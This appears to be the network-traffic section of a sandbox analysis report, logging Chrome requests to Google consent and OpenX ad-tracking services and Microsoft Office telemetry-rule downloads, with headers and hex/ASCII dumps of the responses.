                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzj0tDikmLw0ZBicEqfwRoCxO5aF1n9gfjrnkusf4F478dLrEeBWIiHo_3g5h1sAhP-bGpgUnJJyi-MT87PK0nNK9FNTCnWBbGLMpNKS_KLUNipZSAVOfnp6Zl56fFGBkYmhgaGBnoGZvEFBgDMUy8y"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          92192.168.2.749837142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC994OUTGET /f/AGSKWxUmsMqtSSePcx4h11wfZV5rxyGVnJAk3oRbeOgKg7Io4obCBjjBWNKhsHkvPsx3lQdQWEDqC1eiMud2YT43HJ5HwRq_9qwIjdhbtz3yndJAe8FOk_FaXhRHtllCX0s7Nhk82CqRrQ==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTU3LDYyNjAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly9hbGQubXkuaWQvIixudWxsLFtbOCwidGFCZ0d2UlFDMjAiXSxbOSwiZW4tVVMiXSxbMTgsIltbWzBdXV0iXSxbMTksIjIiXSxbMTcsIlswXSJdXV0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorGlobalRouterHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-k-RbZjHxfLWd6DSC291V1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorGlobalRouterHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorGlobalRouterHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorGlobalRouterHttp/web-reports?context=eJzjamDU4pJi8NOQYjh56zbTRSA-73SH6ToQS3x9yaQBxE7pM1iDgLj15jnWqUCc9O88axEQu2tdZPUHYkOFS6yOIFx0idUTiFV7LrGaAvH9dZdYnwPx1z2XWP8C8d6Pl1iPAnGRxBXWJiC-3XSF9TEQC_FwtB_cvINN4MLD7k4mJY2k_ML45Py8kqLMpNKS_KK05LTU4tSistSieCMDIxNDAwNLPQOj-AIDALWzT1s"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1929INData Raw: 32 38 34 32 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 5a 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 5f 2e 71
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 2842if (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var Zo=function(a){if(!a)return null;a=_.q
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1929INData Raw: 2c 32 29 21 3d 6e 75 6c 6c 3f 5f 2e 4c 28 61 2c 32 29 3a 6e 75 6c 6c 29 26 26 0a 61 3d 3d 3d 31 26 26 5f 2e 4c 6e 28 63 2c 31 30 2c 21 30 29 3b 62 28 63 29 7d 3b 76 61 72 20 70 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 3d 5b 5d 7d 3b 70 70 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 69 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 63 61 6c 6c 2e 61 70 70 6c 79 28 61 2c 5b 62 5d 2e 63 6f 6e 63 61 74 28 5f 2e 68 61 28 5f 2e 49 63 2e 61 70 70 6c 79 28 30 2c 61 72 67 75 6d 65 6e 74 73 29 29 29 29 7d 29 7d 3b 70 70 2e 70 72 6f 74 6f 74 79 70 65 2e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 5f 2e 49 63 2e 61 70 70
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ,2)!=null?_.L(a,2):null)&&a===1&&_.Ln(c,10,!0);b(c)};var pp=function(){this.i=[]};pp.prototype.addEventListener=function(a,b){this.i.push(function(){a.call.apply(a,[b].concat(_.ha(_.Ic.apply(0,arguments))))})};pp.prototype.g=function(){for(var a=_.Ic.app
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1929INData Raw: 6a 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 70 28 61 2c 31 29 3b 62 70 28 62 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 70 28 61 2c 30 29 3b 62 70 28 62 29 7d 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 70 28 61 2c 32 29 7d 29 7d 3b 0a 76 61 72 20 56 70 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 62 2e 63 6c 61 73 73 4e 61 6d 65 3d 61 2e 6f 3b 62 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 70 78 22 3b 62 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 70 78 22 3b 62 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 3b 62 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 2d 31 30 30 30 30 70 78 22 3b 62 2e 73 74 79 6c 65 2e 74 6f 70 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: j,function(){tp(a,1);bp(b)},function(){tp(a,0);bp(b)})},function(){tp(a,2)})};var Vp=function(a){var b=document.createElement("div");b.className=a.o;b.style.width="1px";b.style.height="1px";b.style.position="absolute";b.style.left="-10000px";b.style.top=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1929INData Raw: 73 29 2c 6a 71 28 74 68 69 73 2e 6f 2c 74 68 69 73 2e 6a 29 2c 6b 71 28 74 68 69 73 2c 61 29 29 7d 3b 76 61 72 20 6b 71 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 6e 65 77 20 6f 70 28 61 2e 44 2c 61 2e 41 2c 61 2e 43 2c 61 2e 42 29 3b 45 70 28 61 2e 75 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 2e 73 74 61 72 74 28 65 2c 62 29 7d 29 3b 76 61 72 20 64 3d 69 71 28 61 29 3b 41 70 28 61 2e 75 2c 64 2e 69 63 29 3b 64 2e 4b 63 28 29 7d 3b 76 61 72 20 6c 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 75 28 61 29 7d 3b 5f 2e 79 28 6c 71 2c 5f 2e 4a 29 3b 76 61 72 20 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 75 28 61 29 7d 3b 5f 2e 79 28 6d 71 2c 5f 2e 4a 29 3b 76 61 72 20 6e 71 3d 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: s),jq(this.o,this.j),kq(this,a))};var kq=function(a,b){var c=new op(a.D,a.A,a.C,a.B);Ep(a.u,function(e){c.start(e,b)});var d=iq(a);Ap(a.u,d.ic);d.Kc()};var lq=function(a){this.l=_.u(a)};_.y(lq,_.J);var mq=function(a){this.l=_.u(a)};_.y(mq,_.J);var nq=func
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1929INData Raw: 33 4e 68 5a 32 56 7a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 69 58 53 78 62 49 6d 64 73 62 32 4a 68 62 46 39 69 59 57 35 75 5a 58 4a 66 59 57 51 67 59 57 52 32 5a 58 4a 30 4c 58 42 68 62 6d 55 67 59 57 52 7a 62 57 46 73 62 47 56 79 49 47 52 70 63 33 42 73 59 58 6c 42 5a 46 4e 73 62 33 51 67 59 57 52 32 4c 53 31 73 5a 57 46 6b 5a 58 4a 69 62 32 46 79 5a 43 49 73 57 32 35 31 62 47 77 73 62 6e 56 73 62 43 78 75 64 57 78 73 4c 43 4a 6f 64 48 52 77 63 7a 6f 76 4c 33 42 68 5a 32 56 68 5a 44 49 75 5a 32 39 76 5a 32 78 6c 63 33 6c 75 5a 47 6c 6a 59 58 52 70 62 32 34 75 59 32 39 74 4c 33 42 68 5a 32 56 68 5a 43 39 7a 61 47 39 33 58 32 4e 76 62 58 42 68 62 6d 6c 76 62 6c 39 68 5a 43 35 71 63 7a 39 6d 59 32 52 63 64 54 41 77 4d 32 52 30 63 6e 56 6c 49 6c 30 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 3NhZ2VzLmdvb2dsZS5jb20iXSxbImdsb2JhbF9iYW5uZXJfYWQgYWR2ZXJ0LXBhbmUgYWRzbWFsbGVyIGRpc3BsYXlBZFNsb3QgYWR2LS1sZWFkZXJib2FyZCIsW251bGwsbnVsbCxudWxsLCJodHRwczovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9zaG93X2NvbXBhbmlvbl9hZC5qcz9mY2RcdTAwM2R0cnVlIl0s
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC669INData Raw: 5a 69 5a 54 59 69 4c 47 35 31 62 47 77 73 57 32 35 31 62 47 77 73 62 6e 56 73 62 43 78 75 64 57 78 73 4c 43 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 5a 31 62 6d 52 70 62 6d 64 6a 61 47 39 70 59 32 56 7a 62 57 56 7a 63 32 46 6e 5a 58 4d 75 5a 32 39 76 5a 32 78 6c 4c 6d 4e 76 62 53 39 66 4c 30 4e 76 62 6e 52 79 61 57 4a 31 64 47 39 79 55 32 56 79 64 6d 6c 75 5a 31 64 6c 59 6c 4e 33 61 58 52 6a 61 47 4a 76 59 58 4a 6b 53 48 52 30 63 43 39 71 63 32 56 79 63 6d 39 79 49 6c 31 64 58 51 5c 5c 75 30 30 33 64 5c 5c 75 30 30 33 64 5c 78 32 32 5c 78 35 64 5c 78 35 64 2c 5c 78 35 62 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 78 32 32 68 74 74 70 73 3a 5c 2f 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ZiZTYiLG51bGwsW251bGwsbnVsbCxudWxsLCJodHRwczovL2Z1bmRpbmdjaG9pY2VzbWVzc2FnZXMuZ29vZ2xlLmNvbS9fL0NvbnRyaWJ1dG9yU2VydmluZ1dlYlN3aXRjaGJvYXJkSHR0cC9qc2Vycm9yIl1dXQ\\u003d\\u003d\x22\x5d\x5d,\x5bnull,null,null,\x22https:\/\/fundingchoicesmessages.google.com\/
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          93192.168.2.74984434.98.64.2184432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC766OUTGET /w/1.0/cm?cc=1&id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fidsync.rlcdn.com%2F396846.gif%3Fserved_by%3Devergreen%26partner_uid%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: us-u.openx.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: i=ff675d27-c17a-4d2e-b7ab-ec29a6304351|1728897158
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC579INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Server: OXGW/0.0.0
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept, Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="CUR ADM OUR NOR STA NID"
                                                                                                                                                                                                                                                                                                                                                                          Location: https://idsync.rlcdn.com/396846.gif?served_by=evergreen&partner_uid=790d1d18-a5ba-44b9-b204-a432fb8c1174
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: i=ff675d27-c17a-4d2e-b7ab-ec29a6304351|1728897158; Version=1; Expires=Tue, 14-Oct-2025 09:12:39 GMT; Max-Age=31536000; Secure; Domain=.openx.net; Path=/; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          94192.168.2.74984513.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 478
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 49fa3939-001e-0017-20cd-1a0c3c000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091239Z-17db6f7c8cfbd7pgux3k6qfa60000000054g000000002h2k
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          95192.168.2.74984613.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 423
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: d28b635f-001e-0079-686d-1c12e8000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091239Z-17db6f7c8cfcl4jvqfdxaxz9w800000003mg0000000042m9
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          96192.168.2.74984713.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 404
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 65388d65-201e-0051-79ef-1a7340000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091239Z-17db6f7c8cfq2j6f03aq9y8dns000000059g000000009ep7
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
